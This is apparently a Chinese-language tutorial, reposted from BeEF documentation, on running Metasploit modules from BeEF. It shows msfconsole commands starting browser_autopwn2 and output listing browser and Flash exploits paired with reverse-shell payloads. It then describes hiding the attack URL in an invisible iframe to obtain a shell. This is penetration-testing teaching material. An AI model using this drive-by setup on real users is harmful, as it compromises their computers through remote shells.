BeEF Metasploit

介绍

Metasploit是用于渗透测试的另一种基于ruby 的开源安全工具。它具有漏洞利用、payloads、shellcode等。

BeEF支持Metasploit集成,并且只需要一些简单的配置即可启动和运行。一旦运行,Metasploit模块可以直接通过BeEF界面运行。

Metasploit模块

启动Metasploit之后,您可以在BeEF命令模块树中找到其模块:

所有常规的有效负载CLI参数在模块的界面中都有自己的表单字段:

执行模块后等待漏洞的使用:

浏览器自动

虽然没有直接集成到BeEF中,但是您可以使用Metasploit的Browser Autopwn功能:

msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

首先,启动browser_autopwnbrowser_autopwn2在Metasploit中启动并获取BrowserAutoPwn URL,例如:

msf auxiliary(browser_autopwn2) > run -z 
[*] Auxiliary module execution completed

[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) >
[*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 6.01071043
[*] Using URL: http://0.0.0.0:8080/5WNrYZjr
[*] Local IP: http://10.1.1.175:8080/5WNrYZjr

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  webview_addjavascriptinterface             android/meterpreter/reverse_tcp on 4443
 2      Excellent  samsung_knox_smdm_url                      android/meterpreter/reverse_tcp on 4443
 3      Excellent  firefox_svg_plugin                         firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_webidl_injection                   firefox/shell_reverse_tcp on 4442
 5      Excellent  firefox_tostring_console_injection         firefox/shell_reverse_tcp on 4442
 6      Excellent  firefox_proto_crmfrequest                  firefox/shell_reverse_tcp on 4442
 7      Great      adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 19     Good       adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444
 20     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 21     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://10.1.1.175:8080/5WNrYZjr
[*] Server started.
[*] Starting the payload handler...

请注意BrowserAutoPwn URL: http://10.1.1.175:8080/5WNrYZjr

然后使用“ 创建不可见的iframe”命令模块将自动pwn页面加载到iFrame中:

然后,只需一个shell:

本文章首发在 网安wangan.com 网站上。

上一篇 下一篇
讨论数量: 0
只看当前版本


暂无话题~